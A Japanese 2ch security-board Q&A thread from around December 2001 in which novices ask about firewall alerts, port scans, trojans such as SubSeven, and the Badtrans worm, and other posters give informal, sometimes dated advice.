３４８さん！ありがとうございました。おかげで解決しました。

お腹いっぱい

BlackICE入れてるんですが、アタック多くてこわいっす；
一度や二度ならいいけど、カウントが１２０超えてます。。。
BlackICEってぶっちゃけどうなんでしょうか。
こっちのほうがいいっていうのがあったら教えてください。
気になって朝も起きれません

BlackICEよりsnortの方がいいと思うけど、
止めたほうがいいとも思う。

なんか、20分ほど前にノートン先生のＦｉｒｅＷａｌｌが、
トロイの木馬を止めてくれました。

確認してみると、わらわらといくつも
『なんたらかんたら』トロイの木馬を遮断
とありました。

なんか対策とったほうがいいですかね？

>>357
外部からだったら別に何もしなくていい。
内部からだったら大変なこと。

他スレで流されてしまったのでここで質問させていただきます。

SHIELDS UP!でPORTチェックすると、AlartTrackerがポートスキャンを三十分
遮断する、と表示されますがPORTチェックの結果にUPnPだけがOPENと出ます。
もう一度チェックするとStealthになりますがこれは安全なんでしょうか？
OSはXPでUPnPの修正パッチは当ててあります。

>>358
どうやら内部からのものは無かったようですが、
外部から64個も、いろいろなトロイの木馬が届いてました。

>>359
UPnPは使ってないなら、削除しちゃえば？
コントロールパネル＞アプリの追加と削除＞Windowsファイル＞通信＞
＞詳細＞ユニバーサルプラグアンドプレイのチェックを外す。
どう？

Windowsファイル、というものがないんですが？

>>357=>>360
随所で何度も言われてますが、
「トロイの木馬」は届きません
「トロイの木馬へのパケット」が届くのです
で、そこにトロイが無かったら…以下略。

↓このスレッド何？ひらくだけでNAV反応するよぉ。

またIEにセキュリティホール！ の283コロス！
http://pc.2ch.net/test/read.cgi/sec/1009377717/

>>364
6-7に過剰反応してるんじゃない？

[Tue Dec 18 01:13:20 2001] [error][client 61.136.21.62] Client sent malformed Host header
こんなのがerrorlogにトキドキあるんですが
これはどんなerror？

添付ファイルなしのウィルス付メール（本人が事前に電話で教えてくれた）が
届きました。件名は「FF777…なんとかかんとか〜がお得」とかいう…？？？
速攻削除したので正確でなくてごめんなさい。
これって…なんでしょう？

>>367
なんだろな〜
スキャンしてみれば？
その本人に聞くとか
シマンテックのページ見るとか

＞添付ファイルなしのウィルス付きメール
ウィルスの付いてないウィルス付きメールって何？
意味が分からない。

友達から「ウィルスに感染しちゃったよーメール行くから削除して」と
電話があったのです。
んで、来たメールには添付ファイルがなかったのだけど
本文も見ずに削除しました。こんなこともあるのかな、と。
>368 ありがとう。やってみます。

Shields UP ! の日本語解説サイト
http://www.upsizing.co.jp/news/report0426.htmにて
チェックしたところ、ポートが２１，２３，７９，８０と
開いているとなりました。
どうしたら閉じられるのでしょうか？

こんな環境です。
WIN98　5,1SP2 ケーブル接続　
Zone　ノートンアンチウイルス

21と23と79と80を閉じるように設定すればいい。
それぞれのサービスくらい自分で調べろ。

３７２さん、ありがとうございます。
閉じる設定ができるのですね。
さっそく調べます。

以下の件なんですが、お助けかりたく思います。

自宅で、２台のPC＋ブロードバンド・ルータで、インターネット接続と
ローカルのネットワークをやってます。
NT4と2000がそれぞれインストールされてます。
それぞれの機種に、TCP/IPとNETBEUIを両方入れているのですが、

ttp://trylan.fc2web.com/Tips/security_2k.html

など参考にし、TCP/IPのWINS設定を変更しようとしてるんですが、
それらしい画面がみつかりません。
で、ひょっとして、M$社は、セキュリティ対策として

・インターネット＝TCP/IP
・ローカルのネットワーク＝NETBEUI

とすっぱりわけちゃったのかな？と思ったんですが、どうでしょう？
OSは、両方にSP6aとSP2のサービスパックを充ててあります。
両方とも、IE5.5でして、私はこの方面全くの門外漢です。(笑)
おかしな事いってるのかもしれないと思いつつ、恥をしのんで
お聞きしております。

よろしくお願いします。

>>374

LANで一発OK
http://www.rodry.net/

>>375
有り難うございます……といいたいところですが、これの
どこを読めばいいんでしょう？……（汗
（逆らってるんではないんです。スイマセン）

ひょっとして、あっちで聞けって事ですか？
そうと解釈して移動いたします。
お邪魔しました。

>>377　あっちいって聞く、じゃなくてまず>>375のサイトをちゃんと見ろよ。

Blackiceをクリーンアンインストールできるツールなんかないかな？

>>379
マルチするな。

どーでもいいが、javascript.exeって添付ファイルが大量に送られて来るのだがｗ
6656バイトのファイル。もしかして流行ってる？
http://inet.trendmicro.co.jp/virusinfo/isp/default3.asp?VName=WORM_ZOHER.A

>>362
ないわけないと思うぞ。>Windowsファイル
http://www.sharp.co.jp/support/mebius/tips/tips-zz22.htm
ここを参考に探してみなされ。
きっと見つかるよ。

2ch型掲示板にはどれぐらい穴がありますか？
あったら教えてください。
下にリンクがあります。


2ch型マイナー掲示板「はにちゃんねる」
http://www.isn.ne.jp/~honey/honeychannel/
みんなリンク＆紹介よろしく。

Perlの書き込みはどこよ？

2ch型マイナー掲示板「はにちゃんねる」
http://www.isn.ne.jp/~honey/honeychannel/
みんなリンク＆紹介よろしく。

不用意に開けてしまったのですが、個人情報が抜き取られたのですか？
　　　　　　↓
http://usagi.tadaima.com/2chbbs/subback.html

>>385
今すぐプロバイダーに連絡を

>>381
システム改変無しで、ダイレクトアクションからメモリ常駐、alizっぽいね（ｗ
コメント見る限り。やってる事は若干違うけど。
サイズ6kってば軽い。。
アレのソース、いぢったのかな。。。。
ダイレクトアクションする奴は、パッチ当ててない奴罹るとMASSメーラー
と化すのねん。ﾔﾀﾞﾔﾀﾞ。。。

既出だったらすいません。自分ではなくて友達の話です。

「0」という件名のメール（添付無し）が知り合いから届いたが、
送り主に訊いたらメールは出していないとのこと。
どころかPCを起動もしていないらしい。
本人は既にメールを開いてしまった。

一応すぐ削除しとけと伝えておきましたが、
これはどうなんでしょう？助言頂ければ幸いです。

>>388
ウイルスチェックをして問題なければ大丈夫だと思われ
ウイルス対策ソフトを持っていないとは言わせない

>>389
ありがとうございます。
本人、賞味期限切れでカビの生えたウィルスソフトを
ずっとHDDの奥にしまい込んでいたようなので、
とりあえずオンラインスキャンでやらせます。

ウイルスバスター２００１使っているのですが、
ウイルス検索実行中にWebブラウジングやワープロ等別のアプリで作業をしていても
検索自体に支障は無いのでしょうか？
検索時間が長くなったりハードディスクのアクセスが悪くなるのは仕方が無いですが。

>>391
だめ
検索中は回線を切れ

>>386
プロバイダーは、ヤフーＢＢですが
何て説明すればいいのですか？

>>393
なんともないから連絡しないでよし
ソース見れば分かるだろ

>>394
大丈夫なんですね？ほっとしました
どうも、ありがとうございました

>>395
騙されてるよ

そのルータ、通過する全パケットのログを取るような設定にしてない？

って言われたんですが、意味がわかりません。
その設定を見る、直す、にはどうすればｲｲんですか？

ルータの取説読めよ。ｱﾌｫか

NPFで「ﾌ が ｲﾝﾀｰﾈｯﾄ にｱｸｾｽ しようとしています」
って、たまに出るんだけど。
「ﾌ」ってなんでしょ？

ﾌ.exeではなさそうだな

制御コードですかね？

>>399　文字化けしてるだけだと思われ。

>>397
やっぱり連絡した方がいいのですか？

TCP Port 6346のアクセスが急に多くなったのですが
これは何ですか？？

>>404
ポートにアクセスされてるんだろ

>>402
とすると例えば、IEのプログラム名が文字化けしてるとかで、
NPFが「ｦｲｦｲ、IEは通せるけどﾌは通せないなっ、名前がIEなら
通してやるんだけどなっ」ってなことになってるってことですか？

>>406　意味不明。

>>407
なぜ意味不明？　IEはただの例だと思うが…。

私もです
あと 5634/tcp 6347/tcp も

404>>
多分 gnutella

初めてセキュリティソフトを買おうと思うのですが、何がいいでしょうか。
やっぱりノートン Internet Securoty2002がいいのですか？

>>411
ノートンかバスターがいいと思うよ

とある作業をしていたら、「PELOCKnt v2.04 Virus protection activated・・」
等とエラーが出て、アプリが強制終了してしまいます。
文脈からしてウィルスが関係してるっぽいんですが、一体どういう事なんでしょうか？

あと、PELOCKntってなんでしょうか？HDD内を検索してもそんなファイル有りませんし、
ネットで検索しても情報が得られないので気になるのですが・・

>>413
ウイルスチェックはしてみたのか？

>>414
恥ずかしながら持ってないんです・・＜アンチウィルスソフト
これを機に買おうと思ってます。

>>415
対策ソフトを持たずにネットをうろうろするな
今日は回線切って寝ろ
明日朝イチで買って来い

基本的なことなのかもしれないですけど、
うまく調べることができなかったので、お聞きしたいですが。
ＡＤＳＬの常時接続で、ネットしているのですが、
ブラウザやメーラーを立ち上げてない、接続していない、
ただＰＣを立ち上げているだけの状態でも、
不正浸入されてしまうのでしょうか？

>>417
接続してないってのはモデムの電源切ってるってことか？
だったら侵入は無理

>>418
ありがとうございます。
すみません。モデム自体は、ＰＣの電源切っているときも、
ＯＮになっています。
（常時モデムの電源はＯＮということなのです。）
ということは、モデムの電源が入っていれば、
ＰＣ立ち上げた時点で、不法浸入できる状態になっている、
ということなのでしょうか？

>>419
モデムの電源が入ってればモデムに侵入されるかもしれんな
でも個人のものに侵入される可能性はまずありえない
あんまり心配しないほうがいいぞ

>>420
ありがとうございました。
じゃ、ブラウザを立ち上げてネットしている、とかではなければ、
ＰＣ立ち上げていても、不法浸入は大丈夫なんですね。
少し、ほっ、とできました。
ありがとうございました。

>>421
心配だったらネット繋いでないときはケーブル抜け
それかファイヤーウォール立てろ

２ｃｈの板でクッキーをオンにしないと書き込めない所があるけど、
どういう理由でそうしてるの？セキュリティ上の理由？

>>423
そういう仕様だ

>>421
ルーター使え。あるのと無いのとじゃ、ぜんぜん違う。

http://www.em5000.com/[email protected]

>>424
う〜む。

BackdoorSubSevenに感染してしまいました・・・。
ファイルを削除しようとしてもWINDOWSのフォルダに入ってしまい
削除できません。削除禁止になってるってゆうような文が出るんですが
どうやって削除すればいいんでしょうか？

ルータの話がでているのでお聞きします。
コレガのルータを買ってきましたBAR-SW4P
簡易ファイアーウォールとしても使えるってことなんですけど
この【簡易】って言葉に引っかかっています。
つまり相手が初級ハッカーなら大丈夫
中級ハッカーなら分からない
上級ハッカーなら確実に侵入されると言うことなんでしょうか？

>>428
ここは見たかい？
http://www.symantec.com/region/jp/sarcj/data/b/backdoor.subseven22.html

>421
>じゃ、ブラウザを立ち上げてネットしている、とかではなければ、
>ＰＣ立ち上げていても、不法浸入は大丈夫なんですね。

モデムの電源がONになっている以上PCを立ち上げた瞬間にマシンは
オンライン状態だ。ブラウザが起動してるか否かは関係ない。
PCの電源切るまでいつでも不正アクセス可能。何も安心できない。
勝手に安心してのほほんとしているのは本人の自由だがな。

salaが1月よりグローバルIPアドレスが利用できる
グローバルコースを開始するみたいなんですが
自分はネットゲームとかしないんで、そういう場合は
セキュリティの面からは従来からのプライベートアドレスの
コースでインターネットやってる方が安全でしょうか？

>>429
説明書どおりの機能しかないってことじゃないかな

>>432
プライベートだからっていってもネットに繋げることに変わりはないんだが
ファイヤーウォールでも立てろ

すみません、今日何気にnetstat -anをやってみたら、（一部）

Proto　　Local Address　　　　Foreign Address　　　 State
TCP　　　0.0.0.0:1234　　　　 0.0.0.0:0　　　　　　　LISTENING
TCP　　　自分のIP:1234　　　　64.71.177.66:80　　　　CLOSE_WAIT

というのがありました。ポート1234というと・・Ultor'sというトロイに感染
してるんでしょうか？接続先はbiwa38.he.netという所なんですが、
ここって何ですか？2chに関係してる所でしょうか・・。あと、この板に来たか
らかどうかわかりませんが、今度は上のポートが1234ではなく、1282になりました。

たまたま1234だったんでしょうか？よろしければ教えていただけないでしょうか。

>>434
ZoneAlarmいれてますが
これで大丈夫でしょうか？

>>435
ポートの説明は
http://www.murashima.matsudo.chiba.jp/mura/tcpip-port.htm
ここ

he.netは２ちゃんのサーバ
ウイルスだと思うんならウイルスチェックしとけよー

>>436
使い方を間違ってなければそれでいい

>>417=>>419 よ。>>431さんも言ってるが、安心したらイカンぞ。

はっきり言って >>420 の認識が間違っとる。
大手プロバイダ所有のユーザ用IP（ほとんど個人ばっかり）へ向けてわざわざ
ポートスキャン飛ばすのは、踏み台にできるマヌケな個人ＰＣを探すためだ。
「個人ＰＣが侵入されにくい」というのは、星の数ほどある個人ＰＣの中で
自分のＰＣが選ばれる可能性は低いというだけであって、けっして
「侵入価値が無い＝侵入されない」ではないぞ。

動画(mpg)にトロイって仕込めるんですか？asfは聞いた事が
あるのですが・・・　半角板、ダウン板なんかに張られている
http://202.248.141.204/arika_download/mpeg/Death-Gm02.mpg
テトリスの神業がトロイと言う書きこみがあったのですが・・・

>>440
危険そうなページに直リンするんじゃねえよ。

>440
トロイについては知識が無いので何ともいえないが動画の中身自体は
一見の価値がある。とりあえず俺のノートン先生は無反応だった。
それで絶対安全だという訳ではないが一応報告。

<td><!--let codebase="http://chat.netlineis.com/vcclient/" archive="../COM/volano/WebVolanoChat.zip" code="COM.volano.WebVolanoChat.class" width="430" height="227" align="top"
<param name="cabbase" value="COM/volano/WebVolanoChat.cab"
<param name="color" value="#000000"
<param name="group" value="Free Chat"
<param name="text" value="english.txt" Sorry, but you are not running a Java Compatible Web browser. To take advantage of the latest Web software, <a href="http://cgi.netscape.com/cgi-bin/upgrade.cgi" download Netscape now</a .<br
<a href="http://cgi.netscape.com/cgi-bin/upgrade.cgi" <img src="graphics/netscape.gif" width="90" height="30" border="0" alt="Download Netscape Now!" </a
</appl--></td>

はじめまして
どうやら感染した様です・・・W32.Badtrans
McAfeeVirusScan　でやってみたらでてました・・・
削除しようとしたのですがそのときはできず２回目も検索したら
発見されませんでした・・・　これで大丈夫ですか？
ウナウナカイトウコウ

>>444
シマンテックのオンラインスキャンやってみれ

>>444
駆除ツールがあるからそれで駆除
今日はそれで回線を切ってくれ
対策ソフトを買ってくるまでネットにつないじゃダメ

>>444
感染していたのか、単にウイルスファイルに反応していたのか
その文章ではわからないがInfectedフォルダにウイルスファイルは
隔離されていると思われ。

詳細は↓で勉強してくれ。
猛威をふるう BADTRANS.B　Re: メール （４通目）
http://pc.2ch.net/test/read.cgi/sec/1008355163/1-9

>>444-447
ありがと・・・やってみます・・・
いまウィルススキャンのコントロールをダウンロード してます
感染していたのか、単にウイルスファイルに反応していたのか
というのはウイルス検査でDドライブを検索したら虫が出てきたんです

>>448
駆除が終わるまでレスはするな
こっちにまで迷惑がかかるからな

ところで443は何？

昨日気づきました。ファイルは全てマイドキュメント以下にフォルダを作って管理してるんですが、
そこにあったｔｘｔファイルが全て消えてしまったんです。デスクトップにおいてあったｔｘｔも消えてしまいました。
ｔｘｔの検索をかけても、わずかなｔｘｔとクッキーが出てくるだけです。再起動しても同じでした。

ウイルスソフトはマカフィーで、ＤＡＴを最新の物にしてスキャンしましたが何も出ませんでした。
そこで、マカフィーを消してウイルスバスター２００２の体験版を入れてスキャンしましたが、やはり何も出ませんでした。

最近あった不審な点は、Ｗｉｎの起動後しばらくすると何もしてないのにフロッピードライブにアクセスしようとすることです。
怪しいのは、その前に半角板でトロイ系のブラクラを２回ほど踏んだ事です。
その時に一応マカフィーでスキャンして感染ファイルの削除はしました。

もうリカバリの準備は済んでいるんですが、スキャンしても何もでないというだけあって不安です。
もしもバックアップファイルに潜んでいたら・・・
このウイルス（ワーム？）か不具合について何か知ってる人がいたら教えてください。
ＯＳはＭｅで一度もアップデートやパッチを当てたりしていません。

結果報告します。
ウィルス検出スキャンの結果
80876 個のファイルをスキャンし 0 個のファイルが感染していました。
メモリ上でウィルスは見つかりませんでした。
とのことでした。
皆さんお騒がせしてすいませんでした・・・
単にウイルスファイルに反応しただけだったのかな・・・
しかしなんだったのかな・・・

>>451
ウイルス対策ソフトの製品版を購入してバックアップ含め
スキャンするのがいいと思われ。

>マカフィーでスキャンして感染ファイルの削除
ウイルスの名前はわからないの？
スキャンログは残っていないのか。

>>450
気にするな

>>451
ウイルスはHDDをフォーマットすればたいていは消える
プリインストール版のマカフィーなら削除してノートンかバスターを買え
体験版じゃだめだ

>>452
あんた誰だ

＞＞４５５
４４８っす

>>453
マカフィーは既にアンインストールしてしまいました。トロイの木馬の一種だった事しか覚えてません。

>>454
やはりそうですよね。他のスレで何がいいかよく吟味します。

>>456
じゃあ今日はもう寝なさい
明日は大晦日だが電気店は開いてるだろう
対策ソフトを買って来い

一ヶ月前ぐらいから、


発信者: [email protected]
題名: Re:

みたいなウイルスが送られてくるんですけど、
なんだかわかります？

ちなみにそのまま返信すると、もどってきて
アンダバーを外すと、ウイルスに感染した人にメールが遅れるみたいです。

面倒だからそのままにしてるけど、
きちんとウイルスに感染してますよっておしえた方がいいかな？

>>459
かちゅーしゃ使い？
一ヶ月前から2chの各ページのトップに↓の警告が出てるよ。

W32.Badtransウイルス大流行です。

＞＞４５８　いえっさーー
ごめいわくをかけました。
４４８っす

>>459
W32.Badtrans.B@mm

>>460,462
サンキュです〜。

どうも、初めまして。
ウィルスにやられたっぽいので、原因や対処法をご存じの方がいらっしゃいましたらご教授下さい。

・Windowsの起動時にテキスト文書ファイルが削除される
・ノートンアンチウィルス2001のウイルス定義ファイルが保存されない

何度か３MBくらいの更新ファイルをインストールしましたがOS再起動のコマンドも出ませんでしたし、
OSを再起動して（当然.txt消えました）LiveUpdateを実行すると、また更新ファイルが３MBありました。
LiveUpdateした直後に全ファイルスキャンもしてみましたが、ウィルスは見つかりませんでした。

>>464
オンラインスキャンはどうかな？

464ですが、OSの起動時にFDDも鳴らしてくれますので、FDのテキスト文書も検索しているみたいです。

>465さん
ウィルスバスターオンラインにつないでみましたが、
ActiveXがどうたらこうたらで実行できないみたいです・・・
うぁぁぁぁぁ。

>>464
451,457を書いたものです。同じだね。全く。ｔｘｔの消滅，起動時のフロッピーの作動。ノートン先生は入ってないけど・・・
テキストファイルは全部消えた？検索で「.txt」でクッキーとか何件かはヒットしない？
最近ブラクラ踏んだりしなかった？

>468
.txt検索、やってみました。
（正直、検索した先から消されそうで怖かったですが・・・）
すると、

既定@valuecommerce[2]

などの「既定〜」というファイルがやたらと出てきました。
いくつかの.txtファイルも無事でしたので、開いた先から消していくウィルスなのかな？
どうやら常駐っぽいので、ヤヴァいことしたかも・・・

>>469
それは多分クッキーだと思います。やはりクッキーは消さないみたいですね。
現在裏でウイルスバスターオンラインを動かしています。何か見つかるといいけど・・・

>>470
どんなブラクラだったの？
ソースきぼんぬ

>470
お願いします。

しかし、最近のレスくらい見ろよ、自分・・・
原因はおそらくタスケテ氏と同じく、半角画像掲示板で謎のjpgファイルを見たからですね。
シマンテックでオンラインスキャンできそうなのでやってみます。

ペグ？？　さらに詳しい情報きぼんぬ

>>471
半角で、画像を見ようとして。開いたとたん、OutlookExpressのメールの送信ウインドウがたくさん開き始めた。
宛先はアドレス帳からランダムに。２回も引っかかってしまった。

>>472
今終わりました。何も出ませんでした。

HDぜんぶ消去した上ズタズタに！！ウィルス
http://pc.2ch.net/test/read.cgi/sec/1001662997/
の５９を見てみてください。もしかするとこういうタイプのウイルスなのかもしれません。
起動時にフロッピーが動作する事を考えてもこのタイプが一番怪しいです。

とりあえず応急処置はできました。
「スタート」
→「ファイル名を指定して実行」を選択して「MSconfig」と入力
→MSconfigで起動オプションを選択
→「スタートアップグループの項目を読み込む」のチェックを外す

で再起動したところ、デスクトップのテキストファイルは残りました。

>>475
これで一応大丈夫なんですか？
でも駆除方法や感染するファイルのタイプがわからないのは困りますよね。
今日はもう遅いからリカバリは明日かな。

464ですが、どうやら
http://ton.2ch.net/sec/kako/997/997350129.html
にある

688 名前： 名無しさん＠お腹いっぱい。 投稿日： 01/09/10 11:20

ウイルスチェックに引っかからないのは、厄介だね。
ウイルスよりも、もっと単純なものなのかもしれないね。
単に、スタートアップに勝手に登録される、フォーマットプログラム、
ってだけかもしれん。

というのが正解みたいですね。
プログラム本体を突き止めるには
「START and STOP」　などのスタートアップ監視ソフト
が必要みたいです。
・・・やっぱりシェアかな？

なお、475で自分が書いた応急処置は
「スタートアッププログラムを起動させない」
というだけのものですので、根本的な解決にはなりません。
＞「START and STOP」　などのスタートアップ監視ソフト
があれば何を起動させているかわかりますので、削除も可能ですね。

＞471,473
自分の感染源は半角画像掲示板にアップされていたブツ（すでに流れているでしょう）である可能性が高いです。
・何度も同じURL（biglobeのどこか）に接続しようとしたjpgファイル
・きちんと解凍できなかった圧縮ファイル
のいずれかだと思われますね。
ＭＸはやってないので。

誘導されてきました。
チャットをやってて、ＩＰを抜かれました。
なんかＹＢＢとかいってました。
それで、なんかお気に入りＹは２ちゃんで書いた場所がばれました。
おそらく相手は私のパソコンに入ったとおもわれますが、一体どうしてでしょう。
今、脅されてます。それに、なんかＩＰが
ばれると、ネットでの買い物がまずいとかどうとか、
対策教えてください。

>>479
お前何やってんの
マルチもいい加減にしろよ！

ネタでやってるのか？

>>480
違います、PC板だったかなで
聞いたのですが、これはセキュ板の話っていわれました。
ネタではありません。深刻です。
ずっと悩んで、寝てないです。

>>481
誰も言ってねーよ アホ
マルチに回答するほど無駄なことはねーんだよ
勝手に自分で悩んでろ
ストーカーにでも襲われてろ

>>481
ゴメンなさい。
http://pc.2ch.net/test/read.cgi/win/1009622025/433
です。時間帯を確認してください。

>>482
でした。間違えました。

反省してます。

これから、反省文を書きます。

私は、マルチがそんなにいけないこと
と知らず、してしまった。本当に情けない。
本当に、申し訳ない。悪かったです。

お願いします。教えてください。

SSLで保護されたページに入って次のページにいこうとすると
「SSLで保護されたページから抜けようとしています」とでます。
これはみなさんそうなのでしょうか？ウイルスバスターのファイアーウォールの
セキュリティレベルを最高にしているからなのでしょうか？
初心者の糞みたいな質問ですみませんが、知っている方がいたら教えてください。

>>489
抜けようとしてるならそう
ウイルスバスターとかは関係無し

あぁ、違った。私は、待ちます。眠いです。
しかし、私には守るべき家族がいる。

>>491
てか、ネタか（ｗ
マジレスしようとした俺が馬鹿だった。
糞して寝よっと。

>>492
ネタじゃありません。
もう寝てる時間です。
疲れた。まぶたが・・・

あと、５分まって、こなかったら他で聞きます。
マルチはしたくないです。
嫌われます。教えてください。

教えてください。

>>479
大抵はハッタリなんだけどね。
IP云々よりカキコから推理されることが多いと思われ。

YBB？
なら、あり得るかも。

>>496
でも、さっきからチャットをロムで見張っていたら
ＵＲＬがかかれたので、見てみたら管理者専用の者、
ＩＰと時間が乗ってる奴がでてきたんですよ。
でも、それは更新できないから、一回一回更新するやつなんですけど、
書きの内容からは多分無理でしょう。
でも、可能なんですよね。進入するのは？

>>497
プロバイダーはvillage.infowebここなんですけど、
ヤフーと関係ないですよね。

>>487
良く言った、感動した

629 名前：名無しさん E-mail： 投稿日：01/12/31 03:36
チャットをやってて、ＩＰを抜かれました。
なんかＹＢＢとかいってました。
それで、なんかお気に入りＹは２ちゃんで書いた場所がばれました。
おそらく相手は私のパソコンに入ったとおもわれますが、一体どうしてでしょう。
今、脅されてます。それに、なんかＩＰが
ばれると、ネットでの買い物がまずいとかどうとか、
対策教えてください。

もういいっつうの

>>499
それを早く言ってくれ。
ハッタリの可能性大。もっともinfowebのことはよく知らんが。

まあ、将来のためにもセキュリティ対策はしっかりやっておけ。

でも、ＩＰは一体どうやって抜いたのですか？
身の安全の保障はされたのですか？
寝てもいいのですか？

てか・・オマエは俺が危険だと言ったら危険だと思ってガタガタして
安全だと言ったら安心して寝るのか？　なぁ？ここで出ている情報に
根拠があるものがあると思うか？


追伸 IPアドレスをIPと略すのは止めてください。あほ丸出しです。

ねむい

>>502
>>498はそれらしいようにも見えるが…
わかりにくい日本語でかいてあるのでなんとも言えない。

しかしWin板で結構レスもらってるようだな。

皆様。マルチを相手にするのはやめましょう。板の質が下がります。

寝ます。アドバイスがあったら書いといてください。
必ず見ますので。よろしくお願いします。

>>437
遅くなりましたが、ありがとうございました。

ところでポート1025って常にListenなんですが、これって何でしょうか？
>>437さんが載せてくれたページで見てみたらblackjackとなってました。
検索してもわかりませんでした・・OSはWin98SEです。

Yahoo!BBでIPアドレスが固定されていたのですが、
VMWareなどの仮想マシンにOSをインストールして
ネットワークの設定をしたところ、
ゲストOSにIPアドレスが割り振られたあとに
ホストOSのIPアドレスも変わってしまいました
これはどういうことなんでしょうか？

>>509
プライベートアドレスが割り振られたんじゃないのか？

ZoneAlarmブロックデータは、インターネットの上に、
ＩＰアドレスが202．117．96．15であるリモートのコンピュータのポート3869からあなたのマシンのポート80に送りました。この通信試みがポートスキャンであったかもしれないこと単にインターネットの上で定期的に発せられる嘆願されないコマーシャルのうちの数百万のうちの1つ
またはネットワークコントロールメッセージ。そのような嘆願されないメッセージはしばしばインターネットバックグラウンドノイズと呼ばれます。

こんな形でポート８０のスキャンが異様に多いのですが
なんですか？

>>511
それは80がWebサーバとして使う決まりとなってるからだよ

>>510
もとのIPアドレスに戻すことはできるのでしょうか？

>>512
ほーそなんですか
目的がわかりませんが　しかとですね。

フレッツADSLは固定IPじゃないから気楽だよ、ヤフーは固定なのか　あらま

Nimda等が入れるか入れないかに関係無く、攻撃をしかけようとしてるのだと思われ
apacheたてると良くわかる...
ありもしないexeファイルを探ろうとする。

>>513
VMwareって使ってないからどういう風にIPアドレスが割り振られるのか
わからんっす ごめんね
ゲストとかホストって書いてあるの要するにOSが2つ入ってるってことなのか？

OS Win98SEで通信環境はフレッツISDNでダイヤルアップルータを使用しています。
ウィルスバスター2001を入れてて簡易パーソナルファイヤーウォールなる
ものがついていたので大丈夫だと思っていたのですが
ZoneAlarm等のソフトを入れておかないと安全とは言えない環境でしょうか？

いや、ホストOSは実マシンのOSで、
そのOSにVMWareをインストールすることで
仮想マシンが構築できるわけですが、
その仮想マシンにインストールするOSが
ゲストOSです。

>>519は>>517へのレスです

>>518
ファイヤーウォールソフトは1つでよい
2つ建てると誤作動を起こすぞ

>>519
YBBって絶対固定だったっけ？
どっかの書き込みで変わることもあるってのを見たことはあるんだが

>>521
レスありがとうございます。
という事は現在のウィルスバスターだけで
ZoneAlarmのような役目は果たしてくれてるという事でしょうか？
ウィルスバスター2001の「パーソナルファイアーウォールの
不正進入のログ」というものをさきほどはじめて見て
かなりの数の不正進入があるような記述だったので不安になったのですが
これはログに残っているだけで、きちんとブロックしてくれているのでしょうか？

>>523
http://www.trendmicro.co.jp/product/vb2002/images/scr_pfw.gif
これでしょ？
ちゃんと設定をしてれば大丈夫だよ

>>524
ありがとうございます。
そうです。2001なんで少々画面が違いますが
パーソナルファイアーウォールを有効にするにはチェックを入れています。
ただその下のセキュリティーレベルを設定するバーがないのですが
問題ありませんか？

MLMJLMML.EXEって添付ファイルのついたメールが来た・・・
検索しても何も引っかからない・・・
新種？

>>525
バーはないかもしれないけど設定方法はあるでしょ
説明書をよく読んでくれ

この板、トロイが仕込まれたスレがちょこちょこありません？

の、ソースでしょ？

先日から表示がおかしいんです。
とくてい文字の後ろに
に長いスペースが勝手に入ってしまうんです。
例えば「たしろ」を変換すると、
田代
のようになってしまいます。
一文字としてです。（代の前にカーソル置いて
バックスペースすると、一回で田
まで消える。）
ブラウザで見ても同じようになって、表示がめちゃくちゃ。

ウィルスかと考えてウィスルバスター２００２昨日買ってきて
最新版で
にアップデートしてスキャンしたけどチェックされなかった。
原因わかる人教えて下さい。
win98、3年前のlavieです。

530です。
書き込む時は「田　　　　　　　　　　　　　　　　代」
のようになるのですが、今530見たら間のスペースが消えていました。

いろんな板見て探したいのですが、ブラウザがうまく見れないので
よろしくお願いします。

田代
で、代の前にカーソル→バックスペース
お〜！！ 俺も「田」が消えたぞ？
ウイルスなのか？！恐ゎ〜い！

あ、なんだ。違うのか（ﾜﾗ

>>531
辞書ファイルが壊れてるだけじゃないの？

ATOK使っていて、再インストールしました。
IMEでやっても同じなんです。ブラウザも、
テキスト部分は文字間隔がめちゃくちゃで
まともに読めません。
原因がわからなくて途方にくれています。

>>535
レジストリがいかれてんのかもな？
スキャンしてみな

ブラウザが変なのは別の原因かも
ブラウザも再インストールだ

田代をおもしろ半分に茶化すからだよ

>>537 の意見に一票！

串をつくりたいのですが串とは具体的にどのような役目をはたし
どこでつくれるのでしょう。

>526
ハイブリス

>535
スキャンディスクして、解決しなかったら、ブラウザ再インストール
それでダメならOS再インストール。たぶんセキュリティとは無関係

>539
検索とかした？

ﾌｧｲｱｳｫｰﾙは 166.114.27.*** (TCP Port 3335) [TCP Flags: S]. から、
このｺﾝﾋﾟｭｰﾀ (NetBIOS Session) への ｲﾝﾀｰﾈｯﾄ ｱｸｾｽをﾌﾞﾛｯｸしました。

これは不正アクセス？
フォルダは何も共有してないんだけど。

>>541
アタックじゃないの？

>>541
なぜ不正アクセスだと思うのか理由を述べよ。

>>541
詳しく書かないとどうしようもない。

セキュ板から流れてきたなお前。ネタか？

>>544
ここセキュ板だよｗ

>>541
うわー
まじでスマン、誤爆＆勘違い。掃除して逝ってくるわ。

>>545
重ね重ねにスマンカッタ。

むしろ相手はNBSessionに何の用があったのか？

暮れのご挨拶

田代ウィルス・・・

ケーブルなんですが串を刺すことができません。だれかたすけてください。

お願いします。初心者です

>>551
串させないぐらいで大袈裟すぎ
ケーブルの会社で制限してるんじゃないのか？

てことはつまりできないってことですよね。
無念。どうもありがとうございましｒた。

catvのprivate ipなんだけどfw導入する必要ある？

464で「テキストファイルが消される」と書いた者ですが、
Start and Stopを入れたところ
FDD作動の原因はWininits.LGC（2001/12/28更新）
であることが判明しました。
Start and StopでWininitsをStopすれば大丈夫そうです。

また、実はStart and Stopのインストール前に
BadTransワームの駆除ソフト（Fix_Badt）を使ったんですが、
それ以降デスクトップのテキストファイル削除が行われなくなりました。
よって実際にテキストを消しているのはこのワームなのかもしれません。

あと、「Wininits」がWinMeの作動に必須のファイルみたいなので消去してないんですが、
修復方法などご存じの方がおられましたらレクチャーお願いします・・・

しかし、ノートン先生のスキャンもくぐり抜けるとは・・・
「HD全部〜」のスレのウィルスといい、無敵じゃないってことですな。
気を付けないと・・・

超マイナーなウイルスだったらいちいち対応しないかもしれないからね

soniknapからファイル落とせないんですけど
特別な条件がいるのでしょうか？
単に相性の問題でしょうか？

>>560
それってファイル交換系ソフトか？
あやしいのでオレはアドバイスを避ける

しかも板違いな気がする

>>561-562
板違いですね、失礼しました。

教えてください。
W32.Badtransウイルスに感染したままで
海外の有料サイトなどに入会する為にクレジット
カ−ドの番号を入力したら確立的に
ほぼ１００パ−セントヤバイことになるのでしょうか？
初心者なものでわからないのです。
誰か分かる方教えてください。

>>564
ヤバイだろうね
